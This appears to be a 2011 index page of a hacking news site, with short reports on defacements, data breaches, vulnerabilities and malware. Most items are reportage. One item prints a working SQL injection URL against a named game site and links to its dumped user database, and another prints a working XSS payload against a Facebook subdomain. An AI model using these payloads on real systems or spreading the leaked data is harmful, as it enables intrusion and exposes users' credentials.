The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

Toyota 4x4 - Toyota Land Cruiser Hacked by The 077 Hacked site :  http://4x4-toyota.fr/

The Internet System Consortium's (ISC) open source DHCP client (dhclient) allows DHCP servers to inject commands which could allow an attacker to obtain root privileges. The problem is caused by incorrect filtering of metadata in server response fields. By using crafted host names, and depending on the operating system and what further processing is performed by dhclient-script, it can allow commands to be passed to the shell and executed. A successful attack does, however, require there to be an unauthorised or compromised DHCP server on the local network. Dhclient versions 3.0.x to 4.2.x are affected. The ISC has released an update. Alternatively, users can deactivate host name evaluation or add an additional line to dhclient-script. Instructions for doing so can be found in the ISC's advisory. Alongside dhclient-script, X.org's 'X server resource database utility' (xrdb) is also affected, as it also evaluates host names transferred via DHCP. Crafted host name...

Govt of Orissa website Owned by ZHC XtreMist [ZHC] Hacked site :  http://zssmayurbhanj.gov.in/ Mirror:- http://zone-h.org/mirror/id/13421065

Against the backdrop of the attack on its website by " Pakistan Cyber Army ", the CBI is considering to send its team to the US and Europe to trace hackers involved in the defacement. Sources said the agency officials have pin-pointed three Internet Protocol (IP) address -- a unique numerical label borne by each computer in a network that use worldwide web for communications -- two originated from Seattle, Pennsylvania in the US and other in Daugavpils, Latvia in northern Europe. They said the agency has moved a local court here seeking permission to access authorities in the US and Latvia for collecting information on the IP addresses. The CBI had on December 4 last year registered a case against unknown persons of " Pakistani Cyber Army " for hacking and defacement of its website under various Sections of Information Technology Act.

A new rootkit that uses the master boot record (MBR) to hide itself has been discovered in China and is being used to install an online game password stealer. The bootkit is installed on the computer by a trojan downloader distributed from a Chinese adult site and is detected by Kaspersky as Rookit.Win32.Fisp.a. Once executed, the rootkit makes a copy of the old MBR and replaces the sectors with its own code which includes an encrypted driver. When the computer boots, the malicious code executes and restores the original MBR so that Windows can load normally. It then uses hooks to replace the fips.sys system driver with a malicious one. "It should be noted that the driver fips.sys is not required for the operating system to run correctly, so the system won’t crash when it is replaced," says Kaspersky Lab expert Vyacheslav Zakorzhevsky. The driver scans loaded processes to determine if they belong to one of over a dozen antivirus programs and prevent them from running...

MumbaiITPro User Group Hacked by TriCk [TeaMp0isoN] MumbaiITPro User Group is an online technical community initiative for the IT Professionals. They are supported by Global IT Community Association (GITCA) and Microsoft Corporation. Hacked site :  http://mumbaiitpro.org/ Mirror :  http://mirror.sec-t.net/defacements/?id=7039

Hosting company Hostkey.ru got Compromised ! A hacked Hacked Into Hosting company Hostkey.ru, some Proof of hacks are here : 1.)  Cms Hacked 2.) PhpMyAdmin Hacked 3.) Shell on Server 4.) Config File http://pastebin.com/VbuD0acE 5.) Server Rooted http://pastebin.com/h5RW3w6c Full compromise step-by-step @ forum http://tinyurl.com/dusbitchez News Source :  anonymous 

Multiple vulnerabilities in IBM Tivoli Directory Server Multiple vulnerabilities have been reported in IBM Tivoli Directory Server, which can be exploited by malicious users to disclose sensitive information and by malicious people to cause a Denial of Service and compromise a vulnerable system, according to Secunia. 1. The application bundles a vulnerable version of IBM Java. 2 . An error within ibmslapd.exe when processing certain requests can be exploited to cause a stack-based buffer overflow. Successful exploitation of this vulnerability may allow execution of arbitrary code. 3. The TDS proxy server stores the user's password in cleartext in the audit log when the backend server is configured to audit extended operations. The vulnerabilities are reported in versions 6.1, 6.2, and 6.3.

 Hackers Changes Millions of Passwords to " password " ! Passwords from over 3,000,000 user accounts were apparently set to "password" late last night in a wide-spread hack that affected hundreds of news, retail and Web 2.0 sites. Most affected users are completely unaware of the attack. According to current statistics, 62% of affected users would not notice such a change as their password was already "password". Several sites have reported that they are taking steps to protect compromised accounts. In addition, many sites are creating a new rule to ban using the word "password" as a password. Users are reacting fiercely to the hack but even more so to the ban many sites are putting on one of the world's most popular passwords. Online riots are to be expected. The hacker group named "Obvious" has claimed credit for last evening's attack. Thousands of hacked Twitter and Facebook accounts posted the message "We are a...

Now it's official: HBA-crew v2, was hacked! Ip 'were logged, Database is public! An official statement is as early as the first April before. But was it so funny but not that it was serious: Hi, Now we can not hide it anymore. geloaded Since yesterday evening by a leak in the server the entire database of HBA, packaged and put on various public OCH's been. Because, unfortunately, still in some areas, no IP logging was disabled, we ask you immediately to secure your systems. It's just a matter of time. Starting with the great and stopped at the small. The forum is in the background already reorganized. According to the internals using Co.Admin TheSaint was - made possible the leak. No one can be trusted - unfortunately. Bitter ! be deceived by the private Co. Admin thereby. Well let's look at how the index looked like: "Hacked by a pro of the scene" The Happy Ninja's are the again the scene on its head: First of all, here is the plain tex...

The Hindi Times Hacked by TriCk & RoCk - ZHC & TeaMp0isoN Site: http://www.thehinditimes.com/ Mirror: http://zone-h.org/mirror/id/13410390

Bh-News Has Been Hacked By Dinelson US  Hacked Users : Website : www.bh-news.com

Channel.facebook.com cross-site-scripting (XSS) vulnerability by Edgard Chammas Security researcher Edgard Chammas, has submitted on 02/04/2011 a cross-site-scripting (XSS) vulnerability affecting 1.61.channel.facebook.com, which at the time of submission ranked 2 on the web according to Alexa. It is currently unfixed. Link :  http://1.61.channel.facebook.com/iframe/11?r=http://static.ak.fbcdn.net/rsrc.php/1.js%22%3E%3C/script%3E%3Cscript%3Ealert(%22The%20Hacker%20News%22)%3C/script%3E%3Cscript%3E

Crif.org defaced by participants in # Anonymous The website of the Conseil Représentatif des Institutions Juives de France or the Representative Council for Jewish Institutions of France was defaced by the hackers on steroids over in Anonymous’ operation palestine or #oppalestine. At the time of this writing the website www.crif.org is still defaced. here’s a picture to immortalize the action.

Anonymous successfully taken down http://www.sonypictures.com/ and http://www.sonypictures.co.uk The Sony PS3 console was "hacked" or more appropriately, jail broken, by iPhone hacker, Geohot. Anonymous managed to reverse engineer his own PlayStation 3 to run home brew applications on it.And then later released the method to the public, through his site, geohot.com Sony hit Anonymous with a lawsuit and demanded social media sites, including YouTube to hand over IP addresses of people who visited Geohot's social pages/videos.Pay pal have granted access to Sony for them to view Geohot's Pay Pal account. The judge of the case has given permission to Sony to view the IP addresses of everyone who visited geohot.com Sony are also after another group of hackers for the same case. The PS3 hack which GeoHot released can be compared to the "unlocking" of a phone. i.e. Once you purchase the phone, it's yours, you can do whatever it is you want with it. L...

QNet confirmed that E -commerce portal was down due to DDoS attack QNet has confirmed that its e-commerce portal was recently the target of a Distributed Denial of Service (DDoS) attack. This caused its main website to be offline for over 36 hours. QI Group IT Director, TG Kintanar said, “As a global direct selling company with a busy trading portal, it is not unusual for QNet to become a target for such attacks, although this has never happened before.” QNet is a subsidiary of the QI Group of Companies. “Let me stress that the cyber-attack on our website was not the work of hackers. The DDoS merely blocked customers’ access to our services, causing them great inconvenience. However, as QNet's online security measures were in place, our customer database remained intact throughout the attack. Nothing was compromised.” Kintanar said. He added that upon noticing the attack on March 9, the QNet IT team immediately started working round-the-clock to set up an alternate transacti...

Kroger Customer Database Hacked ! The company announced in an e-mail to customers their system has been hacked by someone outside the company. This means the hacker had access to customer names and e-mail addresses contained in the Kroger database. Kroger stresses only the names and e-mail addresses of customers who voluntarily submitted those addresses to the company may be affected. Kroger says you may receive spam messages from senders you do not know. So, if you receive an e-mail from an unknown sender, do not open it. For more information, you can call Kroger customer service at 800-KROGERS.

Epsilon' s (Marketing services firm) Customer Lists of Major Brands Compromised ! Due to the growing list of brands disclosing that they have been compromised as a result of this breach, I’m going to go ahead and tag this as a massive breach. And I only expect it to get bigger as more announcements come out from Epsilon customers. Read More :  http://bit.ly/hGrQz2

Comodo hacker claim no relation to Iranian Cyber Army ! The alleged hacker of Comodo stepped forward this weekend to explain how he generated bogus SSL certificates for login.skype.com, mail.google.com, login.live.com and other popular internet websites. His story is that he was able to compromise Comodo's partner GlobalTrust.it and InstantSSL.it. Both sites are currently "under construction." He brags how he decided to bring down the SSL root certificate system and began by attacking the RSA algorithm, but when he found the vulnerabilities in these websites he decided on that approach. On that point I would have to agree with him, as hacking the RSA algorithm seems a significantly more difficult challenge, but the text of his "manifesto" is so full of bravado it is difficult to even read. While he is Iranian, he claims no association with the "Iranian Cyber Army" and insists he is simply a hacker with a 1000 times the knowledge and experienc...

Operation #Payback Next target #OpSony by # Anonymous Anonymous Next Press Release as follows : Dear ######## SONY, Congratulations! You are now receiving the attention of Anonymous. Your recent legal actions against fellow internet citizens, GeoHot and Graf_Chokolo have been deemed an unforgivable offense against free speech and internet freedom, primary sources of free lulz (and you know how we feel about lulz.) You have abused the judicial system in an attempt to censor information about how your products work. You have victimized your own customers merely for possessing and sharing information, and continue to target those who seek this information. In doing so you have violated the privacy of thousands of innocent people who only sought the free distribution of information. Your suppression of this information is motivated by corporate greed and the desire for complete control over the actions of individuals who purchase and use your products, at least when those actio...

Inside Story : How RSA was got hacked ! The hack last month at RSA Security has been shrouded in mystery. How did a hacker manage to infiltrate one of the world’s top computer-security companies? And could the data that was stolen be used to impair its SecurID products, which are used by 40 million businesses that are trying to keep their own networks safe from intruders? The division of the EMC Corporation is staying mum about what exactly was stolen from its computer systems, aside from that is was data related to SecurID. But on Friday RSA shed some light on the nature of the attack. In a blog post titled “Anatomy of an Attack,” the company’s head of new technologies, Uri Rivner, described a three-stage operation that was similar to several other recent prominent attacks on technology companies, including a 2009 attack on Google that it said originated in China. In the attack on RSA, the attacker sent “phishing” e-mails with the subject line “2011 Recruitment Plan” to two...

Pradesh Today Hacked (Indian news website) Hacked By ZHC & TeaMp0isoN Hacked sites : Site 1: pradeshtoday.com http://www.pradeshtoday.com/uploads/trick/index.html Mirror:   http://zone-h.org/mirror/id/13373307 Site 2: pradeshtoday.in http://www.pradeshtoday.in/uploads/index.html Mirror:  http://zone-h.org/mirror/id/13373117

Vulnerability in Facebook Email feature Exposed ! This time Facebook username feature is Vulnerable. After Facebook applications, now Facebook username feature can be used to do on Facebook profiles. Not only spam’s but this bug can be used to post illegitimate messages to Facebook users from their friends or either from unknown people without the consent of sender Total Exposure : Knowledge of Facebook id and associated registered email address are the key elements to launch the exploit i.e., to postage of factitious messages on behalf of target user. Other than posting messages, spams are equally potential through this vulnerability. Scenario: To effectively launch the attack the minimum scenario consist on the following : Target username of Facebook user1 (xxxx@facebook.com) and an email id of another Facebook user2 (any email,that used to register the facebook account). To launch the attack an attacker can post fictitious private messages on behalf of target user2 to th...

315 more Website Has Been Hacked By Dinelson US Hacked sites list :  http://pastebin.com/4CvVMPTz

50 Wesbsites Hacked By Ahmdosa Hacker Hacked sites :  http://pastebin.com/XE254JRC

April Fool Hack : Innobuzz (Ethical Hacking Training Institute) hacked The site was self Defaced by Innobuzz for making April Fool to all  ;-)

' The Hacker News ' Magazine - Anonymous Edition - Issue 01 - April,2011 Download now ! Link :  http://theevilhackerz.com/magazine-01-low.pdf ‘The Hacker News’ Magazine contacts : Mohit Kumar, Editor in Chief Email -  thehackernews@gmail.com Facebook Profile -   http://www.facebook.com/unix.root Twitter Profile -  https://twitter.com/TheHackersNews Facebook Page -  http://www.facebook.com/thehackernew

Android users who download a pirated copy of the Walk and Text app are strolling smack into trouble. The rogue app, called Android. Walkinwat, is a corrupted version of the legitimate Android Walk and Text app, the security firm Symantec reported. Walk and Text, which can be found in many third-party app stores in North America and China, uses a smartphone’s camera to show users what’s in front of them as they’re walking and texting. Once Walkinwat is downloaded, a dialogue box appears on the user’s phone that, according to Symantec, “gives the appearance that the app is in the process of being compromised or cracked, when, in fact, the app is gathering and attempting to send back sensitive data (name, phone number, IMEI information, etc.) to an external server.” This is far from the first instance of a corrupted Android app that harvests user data; in early March, a rogue piece of software called DroidDream was found in 58 apps, which were downloaded more than 200,000 times befor...

A hacker stole the credit card details of over 800 members of the IEEE (Institute of Electrical and Electronics Engineers) last December, according to its law firm. A team of IEEE-appointed forensic investigators “concluded that a file containing customer credit card information had been deleted on or about November 17, 2010”, the institute's law firm told the Attorney General of New Hampshire in February [pdf]. The forensic team believed that 828 members’ credit card numbers, associated names, expiration dates and security numbers may have been accessed. It discovered “certain vulnerabilities in the system”, but the IEEE had no proof that the exposed credit cards had been used to make fraudulant transactions, according to the letter.

Indian Institute Bansal IIT-JEE Hacked, Student Database Leaked by Cyb3R_Shubh4M Hacked Site : http://bansaliitjee.com/ Student Database Leaked, Downlaod : [Link Removed For Safety]

The hacker group that exposed holes in McAfee's website knows it's breaking U.S. law, but vows to continue exposing vulnerabilities, especially on security vendor websites. The hacker group that exposed holes in McAfee's website knows it's breaking U.S. law, but vows to continue exposing vulnerabilities, especially on security vendor websites. "We do understand performing security testings without authorization is illegal under U.S. law," stated YGN Ethical Hacker Group, when contacted by Network World via e-mail. The outfit's own website describes YGN as a "small group of young but mature people" based in the country of Myanmar (Burma) who started working together about three years ago. Based on its website advertising, the group, which seeks to emphasize its goals are "ethical," appears to offer vulnerability-testing services while also working on security testing tools. In response to a question about why it's so secretive,...

After the release of FireSheep, Facebook took an important step to help protect Facebook user accounts by allowing users to choose to keep an encrypted connection as long as they used just Facebook and intelligently designed apps. Savvy users immediately discovered that if they tried to use grossly insecure apps such as Farmville, 21 Questions, or a variety of apps by Rockyou then you were switched back to an unencrypted connection. Having an unencrypted connection means that if you are on an unsecured network, such as those frequently found in coffee shops, airports, and many other public places, then another person can mess around with your account and do things like post messages as if they were you. In fact, they are actually logged into your account for the session, but they don’t have your password, so there are some security features they can’t change. Still it is enough access that they can cause a lot of damage. Facebook has addressed the problem by making it so that if y...

Bcwars.com & Pokerrpg.com hacked 200k Email and Plain text passwords ! Bcwars.com & Pokerrpg.com hacked 200k Email, also admin used plain text passwords. Used Sql Injection :  http://bcwars.com/forum/category/-3' union select concat(id,'::::',username,':::::::',password,':::::::',email) from tblUsers-- - Bcwars Database :  http://bit.ly/hD6bEE http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip http://www.megaupload.com/?d=P4B30IVR http://depositfiles.com/de/files/u7unbc4vk http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html http://www.zshare.net/download/884416713e3e2044/ http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/ Pokerrpg Database :  http://bit.ly/hgCGJx http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip http://www.megaupload.com/?d=T41NF4SV http://depositfiles.com/de/files/8qgnt9gll http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html http://www.zshare....

Keyloggers in Samsung Laptops , Officials says - Samsung laptops are in fact secure ! We'll start by saying that we've reached out to  Samsung  for a response here, but as of now, no reply has been given -- neither a confirmation nor a refusal of truth. Why bother mentioning that? If this here story proves true, Sammy could have a serious problem on its hands -- a problem that'll definitely start with a rash of negative PR, and a quandary that could  very well end the outfit up in the courtroom . According to a report by Mohamed Hassan over at  Network World , Samsung allegedly took the initiative to install a keylogger into his recently purchased R525 and R540 laptops. The app was noticed right away after a security scan on both systems, with StarLogger popping up with the c:\windows\SL directory. Where things really get strange is on the support line; reportedly, a supervisor informed Mr. Hassan (after an earlier denial) that the company did indeed install the ...

18 Websites Hacked Hacked Sites : http://tonycleevelandscapes.co.uk/ http://www.qq55765.com/minhal.html http://www.6008765.com/minhal.html http://www.larbresolutions.com/assetmanager/images/minhal.html http://www.m-dev.org/portals/0/minhal.html http://www.vossfotoklubb.com/minebilder/minhal.html http://www.hiku.dk/portals/0/ http://clientvela.pl/portals/1/minhal.html http://www.dnntw.com/portals/0/minhal.html http://www.zjjiashan.lss.gov.cn/portals/0/Cache/minhal.html http://www.wfaic.gov.cn//portals/0/minhal.html http://bc.inter.edu/Portals/0/admisiones_files/indian.html http://www.fril.co.il/Portals/0/skins/indian.txt http://www.dzonny.cz/Portals/0/minhal.html http://www.dnntw.com/portals/0/minhal.html http://med-mali.com/ http://www.allansrealty.com/portals/0/minhal.html http://academy.mytopdog.co.za/assets/upload/image/